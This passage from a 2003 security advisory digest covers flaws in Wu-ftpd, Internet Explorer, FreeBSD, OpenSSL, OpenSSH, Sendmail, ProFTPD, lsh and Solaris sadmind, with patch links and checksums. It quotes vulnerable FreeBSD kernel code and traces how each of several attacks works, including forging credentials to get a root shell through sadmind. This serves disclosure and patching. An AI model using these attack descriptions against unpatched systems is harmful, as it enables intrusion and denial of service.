    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_powerpc.deb
      Size/MD5 checksum:   425452 c3d04af89c64e6e9f0175e6cd4997058

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_sparc.deb
      Size/MD5 checksum:   412196 ae1181c2873a304c583800459da53e5a

Wu-ftpd fb_realpath() off-by-one bug

2003-10-04

Risk level: high

Type: Buffer overflow

Source of info: SCO Security Team

Impact

	Wu-ftpd FTP server contains remotely exploitable off-by-one bug. A
	local or remote attacker could exploit this vulnerability to gain
	root privileges on a vulnerable system.

Overview

Vulnerable Supported Versions

	System				Package
	----------------------------------------------------------------------

OpenLinux 3.1.1 Server prior to   
                          wu-ftpd-2.6.1-14.i386.rpm
OpenLinux 3.1.1 Workstation prior to   
                          wu-ftpd-2.6.1-14.i386.rpm

Patches

OpenLinux 3.1.1 Workstation
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-024.0/RPMS
   Packages
	05b6a116c8160033f16b7c52611c1f86	 
        wu-ftpd-2.6.1-14.i386.rpm
Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-024.0/SRPMS
      Packages
	b53bca2a2dcce72aa0f15c661961d2b6	
        wu-ftpd-2.6.1-14.src.rpm

OpenLinux 3.1.1 Server
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-024.0/RPMS
          Packages
          5dfb4811abe8ccf46d8c523b13ef34d1	
          wu-ftpd-2.6.1-14.i386.rpm
Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-024.0/SRPMS
        Source Packages
	13d7a9857c9151477e20e49f25d48169	
        wu-ftpd-2.6.1-14.src.rpm

Cumulative Patch for Internet Explorer

2003-10-03

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates newly discovered 
vulnerabilities

Overview

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server in a 
popup window. It could be possible for an attacker who exploited this
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the attacker
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML-based e-mail that would attempt to 
exploit this vulnerability.

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server during 
XML data binding. It could be possible for an attacker who exploited 
this vulnerability to run arbitrary code on a user's system. If a 
user visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user action.
An attacker could also craft an HTML-based e-mail that would attempt 
to exploit this vulnerability.

A change has been made to the method by which Internet Explorer 
handles Dynamic HTML (DHTML) Behaviors in the Internet Explorer 
Restricted Zone.  It could be possible for an attacker exploiting a 
separate vulnerability (such as one of the two vulnerabilities 
discussed above) to cause Internet Explorer to run script code in the
security context of the Internet Zone. In addition, an attacker could
use Windows Media Player's (WMP) ability to open URL's to construct 
an attack. An attacker could also craft an HTML-based e-mail that 
could attempt to exploit this behavior.

To exploit these flaws, the attacker would have to create a specially
formed HTML-based e-mail and send it to the user. Alternatively an 
attacker would have to host a malicious Web site that contained a Web
page designed to exploit these vulnerabilities. The attacker would 
then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004, MS03-015,  MS03-020, and MS03-032, this 
cumulative patch will cause window.showHelp( ) to cease to function 
if you have not applied the HTML Help update. If you have installed 
the updated HTML Help control from Knowledge Base article 811630, you
will still be able to use HTML Help functionality after applying this
patch. 

In addition to applying this security patch it is recommended that 
users also install the Windows Media Player update referenced in 
Knowledge Base Article 828026.  This update is available from Windows
Update as well as the Microsoft Download Center for all supported 
versions of Windows Media Player. While not a security patch, this 
update contains a change to the behavior of Windows Media Player's 
ability to launch URL's to help protect against DHTML behavior based 
attacks.  Specifically, it restricts Windows Media Player's ability 
to launch URL's in the local computer zone from other zones.

  By default, Internet Explorer on Windows Server 2003 runs in Enhanced Security Configuration. This default configuration of Internet
Explorer blocks automatic exploitation of this attack. If Internet Explorer Enhanced Security Configuration has been disabled, the protections 
put in place that prevent this vulnerability from being automatically exploited would be removed. 

 In the Web-based attack scenario, the attacker would have to host a 
Web site that contained a Web page used to exploit this 
vulnerability.  An attacker would have no way to force a user to 
visit a malicious Web Site. Instead, the attacker would need to lure 
them there, typically by getting them to click a link that would take
them to the attacker's site.

 Exploiting the vulnerability would allow the attacker only the same 
privileges as the user. Users whose accounts are configured to have 
few privileges on the system would be at less risk than ones who 
operate with administrative privileges. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp  http://www.microsoft.com/security/security_bulletins/MS03-040.asp

Integer Overflow in FreeBSD Kernel [uio]

2003-10-02

Risk level: Serious

Type: DoS

Source of info: Pine Digital Security

Impact

       Local users on a machine with procfs enabled could exploit this
        vulnerability to cause a system panic (denial of service) or
        potentially elevate their privileges.

Overview

The process file system, or procfs, implements a view of the system
        process table inside the file system.  It is normally mounted on
        /proc, and is required for the complete operation of programs
        such as ps(1) and w(1).

        On several places in the procfs implementation the "uio" offset
        parameter is used without proper validation, the following
        code fragment illustrates this:

        /usr/src/sys/miscfs/procfs/procfs_regs.c (edited, line 59-84):

                struct reg r; char *kv; int kl;
                ..

                kl = sizeof(r);
                kv = (char *) &r;
                ...

                kv += uio->uio_offset;
                kl -= uio->uio_offset;

                if (kl > uio->uio_resid) kl = uio->uio_resid;

                ...

                if (kl < 0) error = EINVAL;

                ...

                if (error == 0) error = uiomove(kv, kl, uio);

        As the above code fragment illustrates and since the uio->uio_offset
        parameter is under (indirect) control of the user it is possible
        to disclose large amounts of kernel memory by specifying an
        extremely large or negative value.

Exploitability

        Local users can cause an effective denial of service by attempting
        to read from non resident kernel memory and thus generating
        a system panic.

        Local users could also potentially elevate their privileges by
        reading from terminal input buffers and thus stealing other
        users passwords.

Appendum

        The FreeBSD security officer team spotted a similiar vulnerability
        in the pseudofs implementation. Pine Digital Security recommends
        upgrading even if you do not use procfs.

Patches

 The FreeBSD Project has updated their CVS repositories.

Integer Overflow in FreeBSD Kernel [fhold]

2003-10-02

Risk level: high

Type: Remote DoS

Source of info: Pine Digital Security

Impact

Local users can exploit this vulnerability to cause a system panic (denial of service) or potentially escalate their privileges.

       

Overview

While performing an audit for a customer, Pine Digital Security
        encountered an integer overflow condition which could lead to
        a denial of service attack or privilege escalation.


This vulnerability is similar to the fpathconf vulnerability:
 http://www.pine.nl/press/pine-cert-20030101.txt

  Inside the readv(2) system call we spotted a condition where a
        call to fdrop() is missing. When issueing a readv(2) call with
        an oversized iovcnt parameter the function will return without
        releasing the outstanding file reference.

        Due to the missing fdrop() call inside the readv(2) system call
        is it possible to overflow the reference counter of the file
        structure (int f_count).

        Quoting PINE-CERT-20030101:

         Inside the FreeBSD kernel each file (socket, device or regular
         file) opened is represented by a file structure (sys/file.h).

         Amongst other members this structure holds a reference counter
         (int f_count). This reference counter is increased by the fhold()
         function and decreased by the fdrop() function. (both in sys/file.h)

         For example, when a file is open(2)ed or dup(2)ed the reference
         counter is increased and when the file is close(2)ed again the
         reference counter is decreased. Once the reference counter reaches
         zero, the file structure itself is deallocated.

         Most system calls which perform (blocking) operations on a file
         will issue a fhold() call to prevent the file from being closed
         in the middle of an operation. Once the operation is finished the
         (extra) reference will be released again by issuing a fdrop() call.

Exploitability

	On most vulnerable systems this vulnerability can be reliably
        exploited by local users to escalate their privileges or cause
        an effective denial of service attack.

        Refer to PINE-CERT-20030101 for more information.

Patches

The FreeBSD Project has updated their CVS repositories.

New OpenSSL remote vulnerability (issue date 2003/10/02) - RedHat

2003-10-02

Risk level: medium

Type: Remote DoS

Source of info: CERT

Impact

Mr. Hornik discovered remote vulnerability in OpenSSL package provided
by  RedHat.  Because  of  nature of this bug some other vendors can be
vulnerable  too.  This  vulnerability  is inside SSLv2 server code and
allows  killing  remote process running OpenSSL library as SSL server,
resulting in DoS.

The  vulnerability is different from one found in SSLv2 OpenSSL server
announced on 2002/07/30.

Overview

By  constructing special SSLv2 CLIENT_MASTER_KEY message the following
execution path can be obtained - we are reffering to source lines from
openssl-0.9.6b-32.7.src.rpm from RH 7.3.

When:
I, negotated cipher is some export cipher, for example EXP-RC4-MD5
II, length of the clear is increased for example by 64 (see below)

Then this execution path happens:
1, on ssl/s2_srvr.c:419 condition is_export && (s->s2->tmp.clear+i !=
   EVP_CIPHER_key_length(c)) becomes true because of i, and ii,
2, on ssl/s2_srvr.c:424 i is "fixed", but tmp.clear stays unchanged
3, on ssl/s2_srvr.c:450 because is_export is true integer variable i
   is increased by big enough value (ii,)
4, on ssl/s2_srvr.c:451 die causes abort of the process leading to DoS


Who is affected?
- ----------------

Affected  are  all  RedHat  distributions up to version 8.0 including.
RedHat  published patch on 2003/09/30 silently without issuing warning
about  existence  of  vulnerability. RedHat announced the patch in its
advisory RHSA-2003:291-11.

openssl.org  sources  starting  with  version  0.9.6f and distribution
packages  based  on these versions are not vulnerable, because OpenSSL
starting  from  0.9.6f  are  avoiding  using die() call because of its
potential risk.


Recommendations
----------------

We  recommend  to  upgrade  openssl  package  to the version issued on
2003/09/30  and after in all RedHat distributions up to 8.0. Until the
new   version   will  be  installed  we  recommend  to  disable  SSLv2
functionality  whenever  it  is  possible.  (In  Apache  + mod_ssl for
example  it is enabled by default and it can be disabled, please refer
to mod_ssl documentation.)

Multiple OpenSSH/OpenSSL Vulnerabilities on Irix

2003-09-30

Risk level: high

Type: many types

Source of info: SGI Security Team

Impact

It has been reported that OpenSSH/OpenSSL that ships with IRIX has several
security vulnerabilities that may lead to root access on vulnerable systems

Overview

1) buffer.c vulnerability fixed in OpenSSH 3.7 (CAN-2003-0693)
    http://marc.theaimsgroup.com/?l=bugtraq&m=106373247528528&w=2
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0693

2) More buffer management vulnerabilities fixed in OpenSSH 3.7.1 (CAN-2003-0695)
    http://www.openssh.com/txt/buffer.adv
    http://www.cert.org/advisories/CA-2003-24.html
    http://www.kb.cert.org/vuls/id/333628
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0695

3) Openwall's "memory" security fixes to OpenSSH 3.7.1 (CAN-2003-0682)
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0682

4) ssh-keysign cores dump on IRIX (SGI BUG 899663)

5) Multiple OpenSSL vulnerabilities in ASN.1 parsing
    http://www.openssl.org/news/secadv_20030930.txt
    http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545

Please note that the OpenSSH which ships with IRIX is NOT vulnerable
to the two recent PAM vulnerabilities found in portable OpenSSH 3.7/3.7.1:
    http://www.openssh.com/txt/sshpam.adv
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0786
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0787

    * However, the Freeware OpenSSH from http://freeware.sgi.com/
    is PAM enabled and possibly vulnerable to these issues.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures
be implemented on ALL vulnerable SGI systems.

These vulnerabilities have been corrected in future releases of OpenSSH
and OpenSSL for IRIX.

Patches

This OpenSSH 3.6.1p2 package has the fixes backported from OpenSSH 3.7.1p2:
ftp://patches.sgi.com/support/free/security/patches/6.5.22/openssh.tardist

This OpenSSL 0.9.7b package has the fixes backported from OpenSSL 0.9.7c:
ftp://patches.sgi.com/support/free/security/patches/6.5.22/openssl.tardist

Sendmail prescan() vulnerability

2003-09-29

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

It has been reported that under certain conditions a vulnerability in
 sendmail could allow a remote attacker to execute arbitrary code with
 the privileges of the sendmail daemon, typically root. This effects
 all versions of sendmail including the latest version, 8.12.9.

Overview

This vulnerability is resolved in Sendmail 8.12.10. Sendmail has also released a patch that can be applied to Sendmail 8.9.x through 8.12.9. Information about specific vendors is available in Appendix A. and in the Systems Affected section of VU#784980.

Sendmail 8.12.10 is designed to correct malformed messages that are transferred by the server. This should help protect other vulnerable sendmail servers.

Patches

http://support.sgi.com/
ftp://patches.sgi.com

New PHP 4.3.3 released.

2003-09-25

Risk level: none

Type: none

Source of info: php.net

Impact

The PHP developers are proud to announce the immediate availability of PHP 4.3.3. This release contains a large number of bug fixes and we strongly recommend that all users of PHP upgrade to this version. 

Overview

 After a lengthy QA process, PHP 4.3.3 is finally out!
This maintenance release solves a fair number of bugs found in prior PHP versions and addresses several security issues. All users are strongly advised to upgrade to 4.3.3 as soon as possible.
Bugfix release

PHP 4.3.3 contains, among others, following important fixes, additions and improvements:

    * Improved the engine to use POSIX/socket IO where feasible.
    * Fixed several potentially hazardous integer and buffer overflows.
    * Fixed corruption of multibyte character including 0x5c as second byte in multipart/form-data.
    * Fixed each() to be binary safe for keys.
    * Major improvements to the NSAPI SAPI.
    * Improvements to the IMAP extension.
    * Improvements to the InterBase extension.
    * Added DBA handler 'inifile' to support ini files.
    * Added long options into CLI & CGI (e.g. --version).
    * Added a new parameter to preg_match*() that can be used to specify the starting offset in the subject string to match from.
    * Upgraded the bundled Expat library to version 1.95.6
    * Upgraded the bundled PCRE library to version 4.3
    * Upgraded the bundled GD library to version GD 2.0.15
    * Over 100 various bug fixes!

Denial of service due to ARP resource starvation (FreeBSD)

2003-09-24

Risk level: medium

Type: DoS

Source of info: FreeBSD Project Team

Impact

Under certain circumstances, it is possible for an attacker to flood a
FreeBSD system with spoofed ARP requests, causing resource starvation
which eventually results in a system panic.  (The critical condition
is that a route exists for the apparent source of the ARP request.
This is always the case if the system has a default route configured
for that protocol family.)

Overview

The Address Resolution Protocol (ARP) is fundamental to the operation
of IP with a variety of network technologies, such as Ethernet and
WLAN.  It is used to map IP addresses to MAC addresses, which enables
hosts on a local network segment to communicate with each other
directly.  These mappings are stored in the system's ARP cache.

FreeBSD's ARP cache is implemented within the kernel routing table as
a set of routes for the address family in use that have the LLINFO
flag set.  This is most commonly often AF_INET (for IPv4).  Normally,
when a FreeBSD system receives an ARP request for a network address
configured on one of its interfaces from a system on a local network,
it adds a reciprocal ARP entry to the cache for the system from where
the request originated.  Expiry timers are used to purge unused
entries from the ARP cache.  A reference count is maintained for each
ARP entry.  If the reciprocal ARP entry is not in use by an upper
layer protocol, the reference count will be zero.

If a large number of ARP requests with different network protocol
addresses are sent in a small space of time, resource starvation can
result, as the arplookup() function does not delete unnecessary ARP
entries cached as the result of responding to an ARP request.

NOTE WELL: Other BSD-derived systems may also be affected, as the
affected code dates well back to the CSRG branches.

An attacker on the local network may be able to cause the system to
hang or crash.  The attacker must have physical access to the shared
network medium.  In the case of a wireless network obtaining this
access may be trivial.  Networks where proxy ARP is used to direct
traffic between LANs may be particularly vulnerable to the attack,
as the spoofed ARP requests could be bounced through to the target
via routers implementing proxy ARP.

Because the attack operates at Layer 2, the use of strong encryption
technologies such as IPsec cannot protect a system against the attack.

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:14/arp.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:14/arp.patch.asc

Multiple PAM vulnerabilities in portable OpenSSH

2003-09-23

Risk level: high

Type: many types

Source of info: OpenBSD Group

Impact

Portable OpenSSH versions 3.7p1 and 3.7.1p1 contain multiple 
        vulnerabilities in the new PAM code. At least one of these bugs 
        is remotely exploitable (under a non-standard configuration, 
        with privsep disabled).

Overview

The OpenBSD releases of OpenSSH do not contain this code and are not vulnerable. Older versions of portable OpenSSH are not vulnerable.

Upgrade to Portable OpenSSH 3.7.1p2 or disable PAM 
support ("UsePam no" in sshd_config). 

Due to complexity, inconsistencies in the specification and differences between vendors' PAM implementations we recommend that PAM be left disabled in sshd_config unless there is a need for its use. Sites only using public key or simple password authentication usually have little need to enable PAM support.

ProFTPD ASCII File Remote Compromise Vulnerability

2003-09-23

Risk level: high

Type: Buffer overflow

Source of info: ISS X-Force

Impact

ISS X-Force has discovered a flaw in the ProFTPD Unix FTP server. ProFTPD
is a highly configurable FTP (File Transfer Protocol) server for Unix
that allows for per-directory access restrictions, easy configuration of
virtual FTP servers, and support for multiple authentication mechanisms.
A flaw exists in the ProFTPD component that handles incoming ASCII file
transfers.

Overview

An attacker capable of uploading files to the vulnerable system can
trigger a buffer overflow and execute arbitrary code to gain complete
control of the system. Attackers may use this vulnerability to destroy,
steal, or manipulate data on vulnerable FTP sites.

Affected Versions:

ProFTPD 1.2.7
ProFTPD 1.2.8
ProFTPD 1.2.8rc1
ProFTPD 1.2.8rc2
ProFTPD 1.2.9rc1
ProFTPD 1.2.9rc2
Versions previous to version 1.2.7 may also be vulnerable.

New ipmasq packages fix insecure packet filtering rules

2003-09-21

Risk level: medium

Type: insecure packet filtering rules

Source of info: Debian Security Team

Impact

ipmasq is a package which simplifies configuration of Linux IP
masquerading, a form of network address translation which allows a
number of hosts to share a single public IP address.  Due to use of
certain improper filtering rules, traffic arriving on the external
interface addressed for an internal host would be forwarded,
regardless of whether it was associated with an established
connection.  

Overview

This vulnerability could be exploited by an attacker
capable of forwarding IP traffic with an arbitrary destination address
to the external interface of a system with ipmasq installed.

Patches

http://security.debian.org/pool/updates/main/i/ipmasq/ipmasq_3.5.10c.tar.gz

Buffer overrun and remote root compromise in lshd

2003-09-20

Risk level: high

Type: remote system compromise

Source of info: LSH, Nieles Moller

Impact

All lsh versions prior to lsh-1.4.3, as well as lsh-1.5, lsh-1.5.1 and
lsh-1.5.2, have a *buffer overrun* bug. This bug can lead to remote
root compromise of the lshd daemon, and it can most likely also let a
malicious server execute arbitrary code in the lsh client.

The affected code is run before either host or user autentication.

Overview

The stable release lsh-1.4.3 and the development release lsh-1.5.3
both fix this bug, and two other bugs of similar character (but
different consequences) which were found when greping the code for
similar mistakes.

All users of lsh and lshd should upgrade, and in case you can't
upgrade lshd immediately, you are *strongly* advised to disable lshd
service.

Credit is due to Bennett Todd, who reported a crash which turned out
to be a buffer overrun. Example exploit programs have been posted to
the full-disclosure mailinglist.

NEWS for lsh-1.4.3:

	Fixed heap buffer overrun with potential remote root
	compromise. Initial bug report by Bennett Todd.

	Fixed a similar bug in the check for channel number allocation
	failure in the handling of channel_open, and in the
	experimental client SRP code.

	Backported lshd setsid fix from lsh-1.5. Should call setsid
	both in the pty and non-pty cases.

	Updated the code to compile with automake-1.7.3 and
	scsh-0.6.0.

The NEWS entry for lsh-1.5.3 is similar, but since it belongs to the
development branch, it also contains some new experimental code,

News for the 1.5.3 release

	Fixed heap buffer overrun with potential remote root
	compromise. Initial bug report by Bennett Todd.

	Fixed a similar bug in the check for channel number allocation
	failure in the handling of channel_open, and in the
	experimental client SRP code.

	lshd now has an experimental mode similar to telnet, where it
	accepts the 'none' authentication method and automatically
	disables services such as X and TCP forwarding. This can be
	useful in environment where it's required that /bin/login or
	some other program handle authentication and session setup
	(e.g. handle security contexts and so on).

If you need a bug-fix-only update, you are advised to either stay with
lsh-1.4.3, or apply the relevant three lines of the 1.4.3 patch,
included below, to your 1.5.2 tree.

Patches

http://www.lysator.liu.se/~nisse/archive/lsh-1.4.3.tar.gz
http://www.lysator.liu.se/~nisse/archive/lsh-1.4.2-1.4.3.diff.gz
http://www.lysator.liu.se/~nisse/archive/lsh-1.5.3.tar.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.3.tar.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.2-1.4.3.diff.gz
ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.5.3.tar.gz

Denial of Service Vulnerability in DB2 Discovery Service

2003-09-19

Risk level: Low

Type: DoS

Source of info: Application Security, Inc.

Impact

IBM DB2 provides a UDP service used as a discovery service for locating
DB2 databases on the network. This UDP service shuts down when sent more
than 20 bytes.

Overview

IBM DB2 is a database that provides many services. One of these services
is a discovery service. This is used to locate a service when
configuring a connection. This service listens on UDP port 523.

This service typically receives a packet such as "DB2GETADDR SQL07020".
If a packet larger than 20 bytes is received by the server, the service
will shutdown.

Once the discovery service crashes, the service "DB2 - DB2DAS00" must be
restarted.

This issue is cover under the fix "IY47686: Search Discovery Listener
Denial of Service Vulnerability".

Patches

Apply FixPak 10a from IBM. This can be downloaded from the following location:
http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report

Several buffer management bugs in OpenSSH

2003-09-18

Risk level: high

Type: remote system compromise

Source of info: SuSE Security Team

Impact

A set of new bugs were addressed by the openssh development team. These bugs are fixed in the new 3.7.1 upstream release of the openssh package;

A programming error has been found in code responsible for buffer management. If exploited by a (remote) attacker, the error may lead to unauthorized access to the system, allowing the execution of arbitrary commands.

 Programming errors of a similar kind as described above have been found in other portions of the code, with similar effects.

Overview

1)  problem description, brief discussion, solution, upgrade information

    The openssh package is the most widely used implementation of the secure
    shell protocol family (ssh). It provides a set of network connectivity
    tools for remote (shell) login, designed to substitute the traditional
    BSD-style r-protocols (rsh, rlogin). openssh has various authentification
    mechanisms and many other features such as TCP connection and X11 display
    forwarding over the fully encrypted network connection as well as file
    transfer facilities.

    This is a new release of SuSE Security Announcement (openssh), 
    ID SuSE-SA:2003:038. A set of new bugs were addressed by the openssh 
    development team. These bugs are fixed in the new 3.7.1 upstream release 
    of the openssh package; we have added the necessary changes to our 
    packages preserving the package version to avoid the risk of incompatible 
    behaviour of the software.

    Specifics about the errors found:
    (Topic for SuSE Security Announcement SuSE-SA:2003:038:)
    A programming error has been found in code responsible for buffer
    management. If exploited by a (remote) attacker, the error may lead to
    unauthorized access to the system, allowing the execution of arbitrary
    commands. The error is known as the buffer_append_space()-bug and is 
    assigned the Common Vulnerabilities and Exposures (CVE) name CAN-2003-0693.
    The error was cause for the upstream release openssh-3.7.

    (Topic for SuSE Security Announcement SuSE-SA:2003:039 (this announcement):)
    Programming errors of a similar kind as described above have been found in 
    other portions of the code, with similar effects. These errors are known 
    as "buffer.c/channels.c bug", the CVE name for these errors is CAN-2003-0695.
    This set of errors was cause for the upstream release openssh-3.7.1.
    In addition to the fixes for the buffer.c/channels.c bugs we have added 
    some changes that have been assembled by Solar Designer during his review 
    of the source code. These fixes are considered a precautious measure and 
    are not believed to have a significant effect on the security of the 
    openssh code.

    At the time of writing this announcement, we believe that at least one set 
    of errors as described above is exploitable by a remote attacker. As a 
    reminder,  at the time of writing the SuSE Security Announcement 
    SuSE-SA:2003:038 it was unclear if the bug addressed with the announcement
    (buffer_append_space()-bug) is exploitable. An increasing amount of TCP 
    connection attempts to port 22 as observed in the internet during the 
    past days may indicate that there exists an exploit for the error in the 
    public.

    Please note that we have disabled the Privilege Separation feature in
    the ssh daemon (sshd) with this update. The PrivSep feature is designed
    to have parts of the ssh daemon's work running under lowered privileges,
    thereby limiting the effect of a possible vulnerability in the code. The
    PrivSep feature is turned on/off by the UsePrivilegeSeparation keyword
    in sshd's configuration file /etc/ssh/sshd_config. The feature is held
    responsible for malfunctions in PAM (Pluggable Authentification Modules).
    The update mechanism will not overwrite configuration files that have
    been altered after the package installation.



    SPECIAL INSTALL INSTRUCTIONS:
    ==============================
    After the update has been successfully applied, the ssh daemon (sshd)
    must be restarted for update package to become effective. To restart the
    ssh daemon after the update, please run the following command as root:

      rcsshd restart


    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

Patches

http://www.openssh.com/txt/buffer.adv
  Intel i386 Platform:

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/openssh-3.5p1-107.i586.rpm
      e030b0803481d0f29f576e3b4726284f
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/openssh-3.5p1-107.i586.patch.rpm
      d022894363b99e6bd03e9b2109c2244c
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/openssh-3.5p1-107.src.rpm
      3f7f5ed43c7d795c63fe06148874944a

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/openssh-3.4p1-215.i586.rpm
      91cdd33a4149756b8f6371aa3177a5f4
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/openssh-3.4p1-215.i586.patch.rpm
      3b7c44819c8fed5e33514481d99d4ab7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/openssh-3.4p1-215.src.rpm
      6c3694fc75bcf185035547b85abbc491

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.4p1-215.i386.rpm
      c61781b97767188cc3a39795535307ff
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.4p1-215.i386.patch.rpm
      c222aef79a8fef6d44d8d61fc075efc5
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/openssh-3.4p1-215.src.rpm
      bc327a4150058c9d1216cb96712973a5

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/sec1/openssh-2.9.9p2-156.i386.rpm
      c9928c04b03cb292aa96ad6890a5ee38
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/openssh-2.9.9p2-156.src.rpm
      28aa82be9233e3ba93b94eb138c9ea04

    SuSE-7.2:
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec1/openssh-2.9.9p2-156.i386.rpm
      b369724a788a2c6bd70a448a49530f69
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/openssh-2.9.9p2-156.src.rpm
      98b8b7281fe04aab8c8838adcf195697




    Sparc Platform:

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/sec1/openssh-2.9.9p2-53.sparc.rpm
      97cb0218e9354b8cc062e44a0d6fb19f
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/openssh-2.9.9p2-53.src.rpm
      8cddb96e633864469d7ba08d3cf7436a



    PPC Power PC Platform:

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/sec1/openssh-2.9.9p2-109.ppc.rpm
      37b1e82a3971f5c4c427ce37227b11e0
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/openssh-2.9.9p2-109.src.rpm
      7a19424887772b86d14bacbf5add9628

Remote Root Exploitation of Default Solaris sadmind Setting

2003-09-16

Risk level: high

Type: remote system compromise

Source of info: iDEFENSE Labs

Impact

Solstice AdminSuite is a set of tools packaged by Sun Microsystems Inc.

in its Solaris operating system to help administrators manage systems remotely, centralize configuration information and monitor software usage.

An exploit has surfaced that allows remote attackers to execute arbitrary commands with super-user privileges against Solaris hosts running the default RPC authentication scheme in Solstice AdminSuite. 

Overview

Solstice AdminSuite is a set of tools packaged by Sun Microsystems Inc.

in its Solaris operating system to help administrators manage systems

remotely, centralize configuration information and monitor software

usage.  The sadmind daemon is used by Solstice AdminSuite applications

to perform these distributed system administration operations.  The

sadmind daemon is typically installed and enabled in a default Solaris

installation.


II. DESCRIPTION


An exploit has surfaced that allows remote attackers to execute

arbitrary commands with super-user privileges against Solaris hosts

running the default RPC authentication scheme in Solstice AdminSuite. 

This weakness is documented to some extent in Sun documentation,

http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view .


By sending a sequence of specially crafted Remote Procedure Call (RPC)

requests to the sadmind daemon, an attacker can exploit this

vulnerability to gain unauthorized root access to a vulnerable system.

The sadmind daemon defaults to weak authentication (AUTH_SYS), making

it possible for a remote attacker to send a sequence of specially

crafted RPC packets to forge the client identity. 


After the identity has been successfully forged, the attacker can

invoke a feature within the daemon itself to execute a shell as root

or, depending on the forged credential, any other valid user of the

system. The daemon will execute the program of the attacker’s choice;

for example, spawning a reverse-network shell back to the attacker for

input/output control. Under certain circumstances, a reverse-network

shell could allow for the attacker to bypass firewalls and/or filters. 


III. ANALYSIS


Because the nature of the weakness exists on the application level,

successful exploitation does not require the use of machine-specific

code, nor does it require any previous knowledge of the target's

architecture. Therefore, any local or remote attacker could execute

commands as root on a vulnerable system running the sadmind service. By

default, sadmind is installed and started at system boot time on most

default and fully patched installations of Solaris. While many other

vendors rely on SUNRPC related routines from Sun, this design issue is

confined to Sun's sadmind authentication implementation in Solaris. 

The most inherent threat is if this exploit becomes packaged into a

cross-platform worm were it to become publicly available. 


IV. DETECTION


An exploit has been obtained and demonstrated in real-world conditions

on systems running Solaris or Trusted Solaris operating systems running

sadmind. Default installations of SunOS 5.3 thru 5.9 (Solaris 2.x, 7,

8, 9) on both the SPARC and _x86 platforms are susceptible. In

addition, versions 7 and 8 of Trusted Solaris on both the SPARC and

_x86 platforms are susceptible to exploitation. Exploitation occurs

through an initial request through UDP or TCP port 111 (sunrpc). 


V. WORKAROUNDS


For Solaris hosts that do not require the Solstice AdminSuite related

services, disable the sadmind service by commenting out the appropriate

line in /etc/inetd.conf.  Make sure to restart inetd after changing

this file (e.g. pkill -HUP inetd).


For networks, ensure proper ingress filters are in place on the

Internet router and firewall, especially on TCP and UDP port 111. 


For Solaris hosts that require the Solstice AdminSuite to be running,

the authentication security settings of sadmind should be increased to

STRONG (AUTH_DES) — this is not the default setting. This setting also

